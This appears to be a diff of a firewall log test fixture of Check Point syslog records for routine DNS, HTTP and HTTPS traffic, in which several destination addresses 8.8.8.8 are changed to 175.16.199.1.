+<134>1 2020-03-29T17:48:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504127"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54372"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:48:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"5.255.95.70"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"47406"; service:"80"; service_id:"http"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:48:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7f,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504127"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58113"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:48:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7f,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504127"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58113"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:48:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7f,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"85.236.43.108"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"55780"; service:"80"; service_id:"http"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:48:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7f,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504127"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55562"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:48:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7f,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504127"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55562"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:48:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7f,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"80.84.224.198"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37358"; service:"80"; service_id:"http"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:48:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7f,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504127"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49139"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:48:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7f,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504127"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49139"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:48:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80df7f,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:48:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df84,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"85.236.55.6"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37722"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:48:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df84,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504132"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44438"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:48:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df84,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504132"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44438"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:48:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df84,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"140.211.169.206"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"55750"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:48:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80df89,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"61336"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:48:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80df89,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"194.29.39.27"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44320"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10125"; xlatesrc:"0.0.0.0"]
@@ -3281,7 +3281,7 @@
 <134>1 2020-03-29T17:50:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dfe2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38605"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:50:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dfe2,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35376"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10128"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:50:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dfe2,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56170"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
-<134>1 2020-03-29T17:50:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dfe7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55753"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T17:50:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dfe7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55753"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:50:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dfe7,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"63384"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10129"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:50:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dfe7,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43051"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:50:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dfe7,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50700"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10130"; xlatesrc:"0.0.0.0"]
@@ -3292,71 +3292,71 @@
 <134>1 2020-03-29T17:50:45Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dff5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:51:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e027,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.1"]
 <134>1 2020-03-29T17:51:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e029,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T17:52:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43014"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504331"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52935"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
